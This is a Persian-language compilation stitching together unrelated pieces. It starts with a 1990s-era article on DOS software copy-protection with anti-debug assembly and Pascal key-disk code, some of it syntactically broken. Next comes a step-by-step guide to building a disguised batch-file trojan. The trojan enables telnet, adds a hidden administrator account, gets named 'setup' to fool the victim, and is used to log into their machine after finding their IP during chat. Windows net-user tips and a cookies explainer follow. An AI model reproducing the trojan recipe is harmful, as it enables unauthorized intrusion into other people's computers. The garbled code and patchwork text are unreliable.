با توجه به فزوني نرم افزار در سيستم هاي كامپيوتري از يك طرف و توانايي كنترل كپي هاي غيرمجاز ( از ديدگاه اقتصادي آن ) از طرفي ديگر دليلي محكم جهت بررسي اين شاخه از مهندسي نرم افزار مي باشد.
از آنجا كه متاسفانه قانون Copyright در تمام جهان بجز ايران و چند كشور ديگر اجرا مي گردد, بحث كنترل كپي هاي غيرمجاز حساس تر مي شود. در اين مقاله سعي بر اين است تا ...

 

 

علاوه بر آشنايي با انواع قفل هاي نرم افزاري و اختلاف آن ها با قفل هاي سخت افزاري, بتوانيم به عنوان طراح يك قفل نرم افزاري از محصولات نرم افزاري خودمان حمايت كنيم. ضمنا علاوه بر آشنايي با مفاهيم فوق, نوشتن روتين هاي ضد ديباگ و همچنين نحوه كد كردن اطلاعات نيز لحاظ شده است.
لازم به ذكر است كه اين مقاله حاصل تجربيات چند ساله و زحمات زيادي است كه تقديم مي گردد.
كلمات كليدي
Key Lock, Hard Lock, Software Lock, قفل نرم افزاري، Tag Lock, Anti Debug, قفل سخت افزاري

مقدمه
از آنجا كه زمان زيادي تا سال 2000 باقي نمانده, اما هنوز در كشور ما ايران, نرم افزار جاي خود را به عنوان يك محصول صادراتي پيدا نكرده چرا كه يكي از دلايل اصلي آن عدم توجه جدي به حمايت از توليد كنندگان نرم افزار مي باشد. به هر حال قصد اينجانب از ارائه مقاله, بررسي كم و كاستي هاي نرم افزار در ايران نيست بلكه طريقه حل مشكل موجود در اين بازار نابسامان مي باشد. با توجه به كپي هاي غيرمجازي كه روزانه بصورت كاملا عادي و بدون اطلاع سازنده آن صورت مي گيرد, جلوگيري از اين عمل و كنترل جدي آن امري ضروري و واجب بنظر مي رسد. در ادامه مطلب به توضيح درباره قفل هاي نرم افزاري و سخت افزاري مي پردازيم.
آشنايي با قفل هاي نرم افزاري و سخت افزاري
تعريف قفل هاي نرم افزاري: به هر برنامه اي كه كنترل كپي آن فقط از طريق نرم افزار و بدون نياز به سخت افزار اضافي قابل انجام باشد, گويند.
تعريف قفل هاي سخت افزاري: به هر برنامه اي كه كنترل كپي آن از طريق سخت افزار اضافي قابل انجام باشد, گويند.
با توجه به تعاريف فوق مي توان به تفاوت قفل هاي سخت افزاري و نرم افزاري پي برد. قفل هاي سخت افزاري با توجه به اضافه كردن يك سخت افزار جديد به كامپيوتر ( اغلب از طريق ارتباط با پورت چاپگر ) برنامه خود را كنترل مي كنند. برنامه قبل از اجرا ابتدا با توجه به مراجعه به آدرس سخت افزار نصب شده ( اضافه شده با استفاده از دستور Port ) به سخت افزار مورد نظر خود مراجعه كرده و در صورت يافتن آن, تست هاي مختلف اعم از تست رمز, خواندن اطلاعات و ... مي تواند تصميم گيري نمايد. اما در قفل هاي نرم افزاري برنامه بدون نياز به سخت افزار اضافي و با كنترل رسانه ذخيره سازي مي تواند تصميم گيري كند. ضمنا لازم به توضيح است كه هدف از طراحي قفل هاي نرم افزاري/ سخت افزاري اين نيست كه هيچكس توانايي شكستن ( باز كردن ) آنرا ندارد بلكه مقصود بالا بردن سطح كنترل كپي هاي غير مجاز تا حد ممكن مي باشد. ( چرا كه مي دانيم اطلاعات همه در يك سطح نيست. )
طريقه استفاده از قفل نرم افزاري در برنامه مورد نظر
با توجه به نوع كاربرد برنامه ( كوچك وقابل كپي بر روي يك ديسكت, تحت شبكه و ... ) مي توانيم از انواع روش هايي كه جهت حفاظت از نرم افزار در نظر داريم ( و متعاقبا توضيح داده خواهد شد ) استفاده كنيم. اما مساله قابل بحث اين است كه چگونه از يك قفل منتخب استفاده نمائيم؟
جواب اين سوال متغيير و وابسته به شرايط زير مي باشد:
الف: اعتقاد طراح نرم افزار به اينكه كاربر حتما بايد آنرا خريداري نمايد تا از امكانات آن مطلع گردد.
در اين حالت قفل نرم افزاري در ابتداي شروع به كار برنامه كنترل مي گردد حتي طراح مي تواند در مواقع حساس نيز قفل را مجددا كنترل كند و يا در حالتي كه طراح واقعا سخت گير باشد, مي تواند در زمان هاي مشخصي از وجود قفل اطمينان حاصل نمايد ( مثلا هر 4 ثانيه ). البته در اين حالت طراح بايد روشي را كه جهت كنترل قفل استفاده مي كند, نيز در نظر بگيرد.
ب: اعتقاد طراح نرم افزار به اين كه كاربر مي تواند از نرم افزار به عنوان نسخه نمايشي نيز استفاده كند.
طراح در اين حالت مي بايست در مكان هاي خاصي از برنامه, قفل را كنترل كند. مثلا در يك برنامه حسابداري مي توان تمام بخش هاي سيستم را آزاد گذاشته ( يعني برنامه نيازي به قفل نداشته باشد ) اما در صورتي كه كاربر مايل به استفاده از امكانات گزارشگيري سيستم باشد, قفل نرم افزاري در خواست گردد. مزيت اين روش بر روش قبلي اين است كه ديگر نياز به طراحي نسخه نمايشي جهت مشاهده كاربران وجود ندارد.
آشنايي با نحوه قفل گذاري بر روي يك برنامه
الف: طراح به سورس برنامه دسترسي دارد.
در اين حالت طراح پس از انتخاب روش قفل گذاري, كافيست آنرا به زبان مورد نظر خود پياده سازي نموده و در برنامه خود بگنجاند. ( كه مكان هاي قرار دادن قفل در عنوان قبلي توضيح داده شد. )
ب: طراح ( مجري پروژه ) به سورس برنامه دسترسي ندارد.
گاهي اوقات به يكسري برنامه هاي ارزشمندي برخورد مي كنيم كه فاقد قفل هستند, بنابراين نياز به قفل گذاري وجود دارد. ( البته اين حالت بيشتر در كشور ما و چند كشور ديگر كه در آن ها قانون Copyright معني ندارد, كاربرد دارد. ) جهت تزريق قفل به اين گونه برنامه ها, نياز به آشنايي كامل به ساختار فايل هاي اجرايي (EXE, COM, SYS, ...) وجود دارد چرا كه بايد برنامه اي طراحي كنيم تا همانند يك ويروس كامپيوتري به فايل اجرايي مشخصي بچسبد. البته جهت اينكار بهترين زبان برنامه نويسي, اسمبلي مي باشد. ( بدليل توانايي دخالت در روند اجراي برنامه )
البته در رابطه با نحوه نوشتن اين گونه برنامه ها, روش هاي زيادي وجود دارد كه خود بحثي مجزا را مي طلبد و از حوصله اين مقاله خارج است.
ضمنا براي بالا بردن سطح امنيت برنامه لازم است تا يكسري كد هاي ضد ديباگ در برنامه گنجانده شوند. كدهاي ضد ديباگ, دستوراتي به زبان اسمبلي هستند كه در حالت اجراي عادي برنامه, هيچ تغييري در روند اجراي نمي گذارند بلكه در صورتي كه برنامه توسط ديباگرها اجرا گردد ( مورد ارزيابي قرار گيرد ) بتواند از اجراي آن جلوگيري نمايد. با اضافه كردن كد هاي ضد ديباگ به ابتداي برنامه ( يا قبل از كنترل قفل ) مي توان احتمال دستكاري در برنامه را پائين آورد. ( نحوه نوشتن كد هاي ضد ديباگ در پيوست A آورده شده است.)
آشنايي با روش هاي قفل گذاري و نحوه طراحي آن ها
1- قفل گذاري با استفاده از شماره سريال اصلي ديسكت
همانطور كه مي دانيد, سيستم عامل جهت هر ديسكت يك شماره سريال واحد (UNIQUE) اختصاص مي دهد, بطوريكه شماره سريال هر دو ديسكت با هم يكي نيستند. بنابراين همين خود يك راه تشخيص ديسكت كليد ( قفل ) مي باشد.
جهت استفاده از اين قفل مي بايست شماره سريال ديسكت را خوانده و سپس در داخل برنامه آنرا كنترل نمائيم. يك راه ساده جهت خواندن شماره سريال, اجراي دستور VOL بصورت شكل مقابل است:
VOL >>C:DOSLCK.TMP
بعد با باز كردن فايل LCK.TMP, مي توانيم به محتويات آن دسترسي پيدا كنيم. راه ديگر مراجعه به Boot Sector جهت كنترل قفل مي باشد.
ضريب اطمينان اين قفل در مورد ديسكت ها, 5%-2% بوده و در رابطه با هارد ديسك 60%-50% مي باشد. دليل اين اختلاف اين است كه در حالت قفل ديسكتي با كپي Boot Sector, قفل بر روي ديسكت ديگر قرار خواهد گرفت اما در رابطه با هارد ديسك اينكار به سادگي انجام پذير نيست.
2- قفل گذاري با استفاده از مشخصات سيستم
در اين نوع قفل نرم افزاري, برنامه قبل از اجرا ابتدا مشخصات سيستم را خوانده ( كه اينكار از طريق مراجعه به بخش هاي خاصي از حافظه و يا مراجعه به اطلاعات BIOS انجام مي شود. ) سپس آنرا با فايلي كه قبلا توسط نويسنده نرم افزار بر روي كامپيوتر كپي گرديده, مقايسه مي كند و در صورت عدم برابري, اجراي برنامه پايان مي پذيرد.
اين نوع قفل هنوز هم در بسياري از برنامه ها استفاده مي گردد, اما نكته قابل ذكر اين است كه جهت اطمينان بيشتر به قفل لازم است فايل حاوي مشخصات بصورت كد شده نوشته شده باشد تا امكان دستكاري آن توسط قفل شكنان به حد اقل ممكن برسد.
درصد اطمينان اين نوع قفل 75%-65% مي باشد.
3- قفل با استفاده از موقعيت فايل روي هارد ديسك
اين نوع قفل فقط بر روي هارد ديسك قابل استفاده بوده و به اين صورت است كه فايل اجرايي به موقعيت خود بر روي هارد حساس مي باشد چرا كه قبل از اجرا ابتدا موقعيت خود را از روي سكتورهاي ROOT خوانده و سپس شماره كلاستر اشاره گر به خودش را بدست مي آورد, سپس آنرا با شماره كلاستري كه قبلا توسط برنامه نويس بر روي يكي از فايل هاي برنامه ( ممكن است بصورت كد شده باشد ) قرار داده شده, مقايسه كرده و در صورت برابر بودن اجرا مي شود. اين نوع قفل نسبت به قفل قبلي ( شماره 2 ) استفاده كمتري داشته چرا كه در صورتيكه برنامه از روي بخشي از هارد به ناحيه ديگري انتقال يابد, اجرا نخواهد شد و اين از نظر كاربر بسيار ناپسند مي باشد. ( ضمنا امكان Defra, Scandisk, و ... نيز وجود ندارد چرا كه شماره كلاستر اشاره گر به فايل تغيير خواهد كرد. )
ضريب اطمينان اين نوع قفل نيز 80%-70% مي باشد.
4- قفل با استفاده از فرمت غير استاندارد
اين شيوه يكي از رايج ترين قفل هاي نرم افزاري است كه هنوز هم بصورت جدي مورد استفاده قرار مي گيرد. برخي از دلايل اهميت آن عبارتند از:
- امكان استفاده از روش هاي متفاوت در اين روش
- راحتي و سرعت زياد به هنگام استفاده آن
- وجود ضريب اطمينان بالا و انعطاف پذيري زياد آن
- عدم وجود نرم افزار خاصي جهت باز كردن اين نوع از قفل ها
همان طور كه مي دانيم سيستم عامل جهت دسترسي به اطلاعات يك ديسكت از فرمت خاصي ( 18 سكتور در هر تراك ) استفاده مي كند اما اگر يه تراك به صورت غير استاندارد فرمت شود, ( مثلا 19 سكتور در تراك ) سيستم عامل ديگر توانايي استفاده از سكتورهاي غيرمجاز را نخواهد داشت و بنابراين تمام نرم افزارهاي تحت سيستم عامل مزبور نيز از سكتورهاي مخفي استفاده نكرده, در نتيجه امكان كپي برداري از آنها بسيار ضعيف است. مانيز از همين روش جهت طراحي قفل مورد نظر مان استفاده مي كنيم. بصورتيكه تراك آخر ديسك را بصورت يك سكتوري و با شماره 20 فرمت مي كنيم. سپس جهت كنترل ديسكت به سكتور فوق مراجعه كرده و در صورت وجود, كنترل برنامه را پي مي گيريم. البته غير از تغيير شماره سكتور مي توان از اندازه غير مجاز نيز استفاده كرد يعني بجاي اينكه سكتورها را بصورت 512 بايتي فرمت كنيم, از اندازه 1024, 2048 و ... استفاده مي كنيم. ( قفل نرم افزاري Copy Control كه معروفترين در نوع خود مي باشد, از همين روش استفاده مي كند. )
اين قفل فقط جهت فلاپي ديسك قابل استفاده مي باشد و در صد اطمينان در اين روش حدود 95%-85% مي باشد.
5- قفل با استفاده از شماره سريال ساختگي
اين روش قفل گذاري كه قويترين قفل مي باشد, بصورت مخلوطي از روش هاي 1 و 4 مي باشد يعني ابتدا تراك خاصي را بصورت غير استاندرد فرمت كرده و سپس اطلاعات خاصي را درون آن قرار مي دهند ( شماره سريال فرضي ). اين قفل فقط جهت فلاپي ديسك قابل استفاده بوده و ضريب اطمينان آن حدود 98%-90% مي باشد.
پيوست A- روتين هاي ضد ديباگ Anti Debug Procedures
همان طور كه توضيح داده شد, روتين هاي ضد ديباگ جت جلوگيري از اجراي برنامه هاي ديباگر و يا جلوگيري از ( حد اقل مشكل كردن كار ) دستكاري توسط قفل شكنان, استفاده مي شوند. در زير توضيحات چند روش موثر و مفيد, آورده شده است:
الف: غير فعال كردن وقفه ها
جهت جلوگيري از اجراي مرحله به مرحله ( Trace كردن ) برنامه, مي توان وقفه هاي كنترلر 8359 را غير فعال ساخت. آدرس اين كنترلر 21h بوده و IRQ هاي 7-0 را كنترل مي كند IRQ1 همان وقفه مربوط به صفحه كليد مي باشد. پس با غير فعال كردن اين وقفه مي توان صفحه كليد را غير فعال نمود.
طريقه استفاده:

CS:0100 E421 IN AL,21
CS:0102 0C02 OR AL,02
CS:0104 E621 OUT 21,AL

ب: تغيير بردار وقفه ها
يكي از روش هاي ساده و راحت جهت ضد ديباگ كردن برنامه ها, تغيير برداري است, كه ديباگر از آن استفاده مي كند. (03 ) حتما بخاطر بسپاريد كه در پايان برنامه دوباره آدرس بردار وقفه تغيير داده شده را بازيابي كنيد.
طريقه استفاده:

CS:0100 EB04 JMP 0106
CS:0102 0000 ADD [BX+SI],AL
CS:0104 0000 ADD [BX+SI],AL
CS:0106 31C0 XOR AX,AX
CS:0108 8EC0 MOV ES,AX
CS:010A 268B1E0C00 MOV BX,ES:[000C]
CS:010F 891E0201 MOV [0102],BX
CS:0113 268B1E0E00 MOV BX,ES:[000E]
CS:0118 891E0401 MOV [0104],BX
CS:011C 26C7064C000000 MOV Word Ptr ES:[000C],0000
CS:0123 26C7064E000000 MOV Word Ptr ES:[000E],0000

ج:گيج كردن ديباگر
اين راه يكي از قويترين تكنيك هاي ضد ديباگ بوده كه در آن به وسط يك دستور, پرش مي شود و اينكار باعث قفل كردن ( Hang ) ديباگر خواهد شد.
طريقه استفاده:

CS:0100 E421 IN AL,21
CS:0102 B0FF MOV AL,FF
CS:0104 EB02 JMP 0108
CS:0106 C606E62100 MOV Byte Ptr [21E6],00
CS:010B CD20 INT 20

د: كنترل پرچم هاي CPU
اين روش در برابر ديباگرها بسيار مفيد مي باشد و به اين صورت است كه ابتدا پرچم Trace از CPU را خاموش كرده و در بين برنامه آنرا كنترل كنيم. در صورتيكه اين پرچم روشن شده باشد, مشخص است كه ديباگر در پشت صحنه در حال اجراست.
طريقه استفاده:

CS:0100 9C PUSHF
CS:0101 58 POP AX
CS:0102 25FFFE AND AX,FEFF
CS:0105 50 PUSH AX
CS:0106 9D POPF

و در بين برنامه از دستورات ذيل استفاده كنيد:

CS:1523 9C PUSHF
CS:1524 58 POP AX
CS:1525 250001 AND AX,0100
CS:1528 7402 JZ 152C
CS:152A CD20 INT 20

ه: متوقف ساختن ديباگر
اين روش باعث متوقف شدن ديباگر مي شود كه با اجراي دستور ساده INT 03 مي توان اين كار را انجام داد.
طريقه استفاده:

CS:0100 B96402 MOV CX,0264
CS:0103 BE1001 MOV SI,0110
CS:0106 AC LODSB
CS:0107 CC INT 3
CS:0108 98 CBW
CS:0109 01C3 ADD BX,AX
CS:010B E2F9 LOOP 0106

پيوست B- روش هاي كد كردن اطلاعات Data Coding Procedures
الف: افزودن يك عدد به كد هاي يك فايل
در اين روش جهت كد كردن يك فايل, ابتدا آنرا خوانده و سپس يك مقدار خاص, مثلا 20 را به مقدار هر بايت فايل اضافه مي كنيم. اين يكي از ساده ترين روش ها بوده و نسبتا كارايي خوبي نيز دارد. جهت خارج كردن فايل از حالت كد شده ( Decode ) نيز, كافيست مقدار فوق را از تمام بايت هاي فايل كم كنيم.
ب: XOR كردن كل فايل
در اين روش نيز پس از خواندن كل فايل, تمام بايت هاي آنرا با رشته كاراكتري يا عدد ثابت خاصي XOR كرده و سپس مقدار جديد را در فايل حاصل ضبط مي نمائيم. جهت خارج كردن فايل از حالت كد شده, دقيقا عمل فوق را انجام مي دهيم.
پيوست C- ليست برنامه قفل گذار Pascal Source To Learn
در زير ليست دو برنامه نمونه, كه شماره (1) جهت درست كردن ديسكت قفل و شماره (2) جهت تست آن طراحي شده, آورده شده است:
در اين برنامه ها از تراك 81 و سكتور 20 ( در حالت عادي هر ديسكت فقط 18 سكتور دارد ) جهت قفل برنامه استفاده شده و به اين صورت عمل مي كند كه يك رشته را از كاربر دريافت كرده و در مكان فوق قرار مي دهد و سپس جهت تست رشته دريافتي در برنامه دوم آنرا با اطلاعات موجود در ديسكت مقايسه مي كند و با دادن پيغام مناسبي آنرا چاپ مي نمايد.
اين برنامه توسط Turbo Pascal 7.0 كامپايل و اجرا شده اند.
{
برنامه شماره(1)
اين برنامه جهت ساختن ديسكت قفل استفاده مي شود
}

program PROGRAM-1;
Uses Dos;
TYPE
DAT = String[40];
VAR
C : Registers;
FP : String[15];
PU : Array[1..512] of char;
Data: Dat;
I : Byte;
Key : Dat;
{******************************************}
Procedure ZUW;
Begin
Fp:=#81+#0+#20+#2;
c.d1 :=0;
c.dh :=0;
c.ch:=81;
c.c1:=20;
c.a1:=1;
end;
Procedure Write-Key(data:Dat);
Begin
c.ah:=5;
ZUW;
c.es:=Seg(fp[1]);
c.bx:=Ofs(fp[1]);
Intr(19,c);
c.ah:=5;
ZUW;
c.es:=Seg(fp[1]);
c.bx:=Ofs(fp[1]);
Intr(19,c);
For i:=1 to Length(data) do
Pu:=data;
Pu[i+1]:=#0;
c.ah:=3;
ZUW;
c.es:=Seg(Pu);
C.bx:=Ofs(Pu);
Intr(19.c);
end;
{=======================================}
begin
Writeln;
Writeln(' Program Number1 ');
Writeln(' This Program Used For Create The Key ');
Write(' Please Type Key Word : ');
Readln(Key);
Writeln;
Write(' Writing Key ...');
Write-Key(Key);
Writeln(' OK .');
Writeln;
end.

{

برنامه شماره (2)
اين برنامه جهت كنترل ديسكت قفل استفاده مي شود
}

program PROGRAM-2;
Uses Dos;
Type
DAT = String[40];
Var
C : Registers;
FP : String[15];
PU : Array[1 ..512] of char;
Data: Dat;
I : Byte;
Key : Dat;
{********************************************}
Procedure ZUW;
Begin
Fp:=#81+#0+#20+#2;
c.d1:=0;
c.dh:=0;
c.ch:=81;
c.c1:=20;
c.a1:=1;
end;
{********************************************}
Function Read-Key(Key:Dat):Boolean;
Begin
c.ah:=2;
ZUW;
c.es:=Seg(pu);
c.bx:=Ofs(pu);
Intr(19.c);
c.ah:=2;
ZUW;
c.es:=Seg(pu);
c.bx:=Ofs(pu);
Intr(19,c);
I:=1;
data:=";
While pu<>#0 do
begin
Data :=data+pu[];
Inc(I);
end;
If data=Key then
Read-Key:=True
Else
Read-Key:=False;
end;
{***********************************************}

begin
Writeln;
Writeln(' Program Number2 ');
Writeln(' This Program Used For Check The Key ');
Write(' Please Type Key Word : ');
Readln(Key);
Writeln;
If Read-Key(Key)=False then
Writeln(' I am Sorry , Not Found .');
Else
Writeln(' Very Good , That Found .');
Writeln;
end.

موادلازم: یک عدد user name و password  .  یک عددIP کامپیوتر طرف وباز بودن پورت 23 کامپیوتر طرف.
طرز تهیه: برای به دست آوردن user name و password و همچنین باز کردن پورت 23 به یک عدد تروجان نیاز داریم که
هم می توانیم از نرم افزار های موجود استفاده کنیم و هم می توانیم خودمان بسازیم
طرز تهیه تروجان : ما این تروجان را با فایل bat می سازیم که اگر با فایل های bat اشنایی دارید که فبها المراد در غیر این صورت
باید این توضیح را عرض کنم که این فایل ها با پسوندbat ذخیره شده و می توانند دستورات را در محيط cmd اجرا کنند.
خب ! حال می توانید notepad را باز کنید و دستورات زیر را در آن تایپ کنید.

echo off@
net start telnet 23
net user home "hello" /add
net localgroup administrators home /add
(شما از سمت چپ تراز کنيد)
سپس با پسوند bat ذخیره میکنیم.
دستور اول باعث خاموش شده اکو میشود. یعنی دستورات دیده نشده و فقط نتیجه ان دیده می شود.
دستور دوم پورت 23 کامیوتر را باز میکند که باز بودن ابن پورت باعث می شودکه بتوان بعد از وارد شدن هم حذف و هم اضافه کنیم.
دستور سوم کاربری با نام home و با پسورد hello در کامپیوتر طرف می سازد.
و دستور آخر کاربر home را از گروه Administrator معرفی میکند.
حال برای این که این دستورات دیده نشوند می توان از برنامه bat2com استفاده نمود که فایل مذکور را به پسوندcom تبديل می کند.
.حالا برای این که تابلو نشود میتوان نام ان را setup قرار دهیم.حالا این تروجان اماده است.
اگر برنامه bat2com را نداريد می توانید ایمیل بزنید.
مرحله بعد بدست اوردن ای پی طرف است که این کار یک کمی مشکل است اما ...
برای بدست اوردن ان می توان در هنگام چت با طرف تمام پنجره ها را بست مگر پنجره چت با طرف سپس cmd را باز کرده و دستور زیر را وارد کرده و اینتر را بزنید.

netstat -n
در قسمت foriegn ادرس IP یارو است مثلا 127.0.0.1 بدست امده است.
حالا باید فایل را فرستاده و طرف ان را اجرا کند.
الان همه چیز اماده است.
برای وارد شدن به کامپیوتر يارو cmd را باز کرده و دستور زیر را وارد می کنیم.

telnet 127.0.0.1 23
پیغام زیر ظاهر می گردد

Welcome to Microsoft Telnet Client
Escape Character is 'CTRL+]'
You are about to send your password information to a remote computer in Internet
zone. This might not be safe. Do you want to send anyway(y/n):
no را تايپ کرده و اينتر را میزنیم پیغام زیر ظاهر می گردد

Welcome to Microsoft Telnet Service
Login:
حالا username (که در مثال بالا home بود)را وارد کرده و اینتر میزنیم
سپس password (که در بالا hello بود) را زده و اینتر میزنیم
حالا پیغام زیر ظاهر میگردد که نشان می دهد ما در کامپیوتر طرف هستیم.

طریقه ایجاد وحذف و تغییر  کابر توسط Cmd:

برای ایجاد یک کاربر جدید میتوان از دستور زیر استفاده کرد.

net user [username] "[password]" /add

به عنوان مثال دستورات زیر باعث ایجاد یک کاربر به نامhome  با پسورد hello می شود.

net user home "hello" /add

همچنین می توان پسورد کاربرهای قبلی را نیز تغییر داد.و به داشتن پسورد قبلی نیازی نیست.این کاربر ها باید و جود داشته باشند.

دستور زیر باعث تغییر پسورد کاربر home به abcd ميشود.

"net user home "abcd

همچنين برای برداشتن پسورد بايد  ""  را به جای پسورد گذاشت.مثال a

برای حذف کاربر نيز بايد از سوييچ del / استفاده نمود.مثال b

"" a) net user home

b) net user home /del

برای تغيير پسورد administrator ميتوان از دستورات بالا استفاده نمود و به جای user name بايد administrator را وارد نمود.

جلوگیری از تغییر کلمه عبور توسط cmd :

کسانی که با دستورات net اشنايی دارند حتما بر اين موضوع واقفند که اين دستور از قابلیت های بسیاری برخوردار است به طوری که با این دستور می توان کلمه عبور را بدون داشتن رمز قبلی تغییر داد.

برای این که نتواند کسی کلمه عبور شما را از این طریق تغییر دهد می توانید از طريق گزينه زير وارد شده

Control Panel/Performance and Maintenance/Administrative Tools/Local Security Policy/Account Policies/Password Polici/Password must meet complexity requirements

و این گزینه که به طور پیش فرض غیر فعال است را فعال نمایید.به اين ترتيب ديگر کسی نمی تواند از طريق Cmd کلمه عبور شما را عوض نمايد.(قابل توجه اقای x که password خودش رو عوض کرد و انداخت تقصير يکی ديگه).

تنظیم ساعت کار ویندوز با Cmd:

برای این کهwindows  شما در ساعاتی مشخص از هفته قابل استفاده باشد و در ساعات دیگر کسی نتواند از ان استفاده نماید می توانید از دستور زیر استفاده کنید.

,.,[Net user [username] /time:[day,start time[am|pm]-end time[am|pm

به عنوان مثال این دستورات       ;net user home /time:f,10am-10pm;w,5am-7am

کاربری با نام  home    را در ر روزهای جمعه از ساعت 10 صبح تا 10 شب و روز های جهارشنبه از ساعت 5 صبح تا 7 صبح فعال می کند.

لازم به ذکر است که غیر فعال بودن ان به اين معنی است که نام انهادر Welcome screen ظاهر میگردد اگر ساعات ان غیر مجاز باشد کادر پسورد میاید که هیچ کس از ان اطلاعی ندارد در غیر این صورت وارد ان میشود.

همچنین روزهای هفته باید به صورت زیر در فرمان ظاهر گردند   جمعه f, شنبه  sa    , یکشنبه su  , دوشنبه   m  ,سه شنبه  t   ,چهار شنبه  w , پنج شنبه  th.

برای باز گرداندن به حالت اولیه میتوانید از دستور زیر استفاده کنید

Net user [username] /time:all

که به جای  user name باید نام کابری خود را وارد کنید.

طريقه گرفتن Export از شاخه های رجيستری توسط Cmd :

برای اين کار ميتوانيد از دستور زير استفاده کنيد.      reg export KeyName FileName

به جای KeyName نام شاخه ای که می خواهيد از ان Export  تهيه کنيد را بنويسيد و به جای  FileName مسير و نام فايل را قرار می دهيد.

به عنوان مثال دستورات زير از شاخه

[HKEY_CURRENT_USER\Software\Microsoft\winmine]

فايلی با نام min.reg در درايو: D  می سازد.

reg export "hkcu\software\microsoft\winmine" d:\min.reg

همچنين به جای شاخه های اصلی بايد معادل های ان را به کار برد.

HKEY_CLASSES_ROOT]     :   hkcr]
HKEY_CURRENT_USER]     :   hkcu]
HKEY_LOCAL_MACHINE]   :   hklm]
HKEY_USERS]                   :   hku]
HKEY_CURRENT_CONFIG] :   hkcc]

همچنين ميتوانيد عمليات reg copy , reg delete , غيره را بر روی رجيستری انجام دهيد.برای اطلاعات بيشتر به Help ويندوز مراجعه کنيد.

 

انواع مختلفی از کوکی ها وجود دارد و شما در نسخه های جدیدتر وب بروسر ها (Web Browsers) این امکان را دارید که انتخاب کنید کدام کوکی ها برروی کامپیوتر شما ذخیره شوند در صورتی که کوکی ها را کاملا غیر فعال کنید ممکن است بعضی سایت های اینترنتی را نتوانید ببیند و یا از بعضی امکانات مثل به یاد داشتن شناسه و رمز عبور شما در آن سایت محروم شوید و یا انتخاب هایی که داشتید مثل ساعت محلی و یا دمای هوای محلی و کلا از تنظیمات شخصی ای که در آن وب سایت انجام داده اید نتوانید استفاده کنید.
کوکی ها چگونه مورد استفاده قرار می گیرند؟
همانطوری که گفتیم کوکی یک فایل است که توسط یک وب سایت برای حفظ اطلاعات بر روی کامپیوتر شما قرار می گیرد یک کوکی می تواند شامل اطلاعاتی باشد که ...

 

 

شما در آن سایت وارد کرده اید مانند ای میل - آدرس - شماره تلفن و سایر اطلاعات شخصی - همچنین کوکی ها می توانند صفحات و یا کارهایی را که در آن وب سایت انجام داده اید مثل تعداد کلیک لینک های بازدید شده و مدت بازدیدرا نیز ضبط کنند. این به سایت کمک می کند تا دفعه بعد که به آن سایت بازگشتید اطلاعات شما را به خاطر داشته باشد و از وارد کردن تکراری اطلاعات خودداری کنید نمونه بارز این مطلب لاگ این ماندن شما در آن سایت است و یا پیغام های Welcome Back و یا حفظ تنظیماتی که درآن سایت انجام داده این به عنوان مثال می توان به خصوصی کردن صفحه My MSN اشاره کرد. نکته ای را که باید به خاطر داشته باشید این است که هر وب سایت فقط می تواند از اطلاعاتی که شما وارد کرده اید استفاده کند نه بیشتر مثلا اگر ای میل خود را در آن سایت وارد نکرده اید آن وب سایت نمی تواند ای میل شما را به دست آورد و یا به سایر اطلاعات کامپیوتر شما دست یابد . مورد دیگر اینکه وب سایت ها فقط می توانند کوکی هایی را که خود ایجاد کرده اند بخوانند و نمی توانند از سایر کوکی های موجود استفاده کنند. وقتی که از یک وب سایت برای بار دوم بازدید می کنید آن وب سایت به دنبال کوکی مربوط به خود می گرد و در صورت وجود از آن استفاده می کند.( البته باز هم با توجه به تنظیماتی که انجام داده اید )
انواع کوکی ها:
کوکی های پایا - دائمی (presistent Cookies):
این نوع کوکی ها به عنوان یک فایل بر روی کامپیوتر شما ذخیره می شوند و بعد از بستن مرورگر اینترنتی شما پاک نخواهند شد و همچنان باقی می مانند. این کوکی ها قابلیت به روز شدن توسط سایت ایجاد کننده خود را دارند همچنین سایت اجازه دسترسی مستقیم به این کوکی ها رو نیز دارد حدود 80 درصد کوکی های مورد استفاده از این نوع هستند.
کوکی های موقت (Temporary Cookies):
کوکی هایی هستند که بعد از بستن مرورگر اینترنتی شما و یا خروج از سایت استفاده کننده از کوکی پاک می شوند.
نوع دیگر کوکی های موقت کوکی های زمان دار هستند که زمانی برای کار دارند و بعد از آن اصطلاحا Expire می شوند و از کار می افتند ولی پاک نمی شوند و در صورت بازدید مجدد از سایت ممکن است به روز رسانی شوند و مجددا مورد استفاده قرار بگیرند.
کوکی های ناخوشایند؟* (Unsatisfactory cookies)
این کوکی ها اجازه دسترسی به اطلاعات خصوصی شما را برای استفاده دویاره بدون پرسیدن از شما دارند از این کوکی ها بیشتر در خرید های اینترنتی و سایت امن (SSL*) مورد استفاده قرار می گیرند.
مقایسه کوکی های متعلق به سایت اصلی (First Party) و کوکی های متعلق به سایت های دیگر (Third Party)
دوستان قبل از هر چیز اجازه بدین با دو مفهوم First& third party اشنا شویم این مفاهیم در حقیقت مفاهیم بیمه ای هستند :
First Party: عضو اصلی یک خانواده و یا شرکت صاحب حقوق و مزایای اصلی کسی که بیمه نامه اصلی را داراست (Policy Holder)
Second party : شرکت بیمه کننده
Third Party : هر شخص سومی غیر از این دو کلا بقیه افراد
و اما این مفاهیم در کوکی ها چه معنایی می دهند؟
First Party : کوکی هایی هستند که فقط اطلاعات آنها به سایت که توسط آنها ایجاد شده اند فرستاده می شود و کار آنها همانطور که اشاره شد یادآوری اطلاعات ماست.
Third Party : کوکی هایی هستند که اطلاعات را به چندین سایت مختلف غیر از آنچه بازدید می کنید می فرستند استفاده این کوکی ها معمولا تجاری است بدینگونه که شما از سایتی بازدید می کنید و آن سایت دارای بنرهای تجاری و تبلیغات از سایت دیگری (Third Party) می باشد در اینجاست که کوکی Third Party وارد عمل شده و اطلاعات شما را ثبت می کند به عنوان مثال صاحب تبلیغ با استفاده از این امکان می تواند ببیند که شما چه نوع تبلیغ هایی را بازدید می کنید و در کدام سایت ها. این نوع کوکی هم می توانند از نوع دائمی و هم موقت باشند. اصولا این نوع کوکی ها استاندارد نیستند و توسط مرورگرهای جدید بلوک می شوند. همچنین این کوکی ها ممکن است به هکر ها کمک کنند تا اطلاعات شخصی شما را بدست بیاورند.( برای جلوگیری از آخرین پچ های مرورگر خود استفاده کنید*) اصولا پیشنهاد می شود تا این کوکی ها را که هیچ استفاده مفیدی برای کاربر ندارند بلوک کنید.

حتما تا كنون با عناويني همچون FAT16  و FAT32 آشنا هستيد . اين دو از سيستم  هاي فايلي مايكروسافت هستند كه در حال حاضر با توجه به گسترش زمينه هاي مختلف سيستم هاي كامپيوتري ناكارآمد و غير قابل اطمينان هستند .
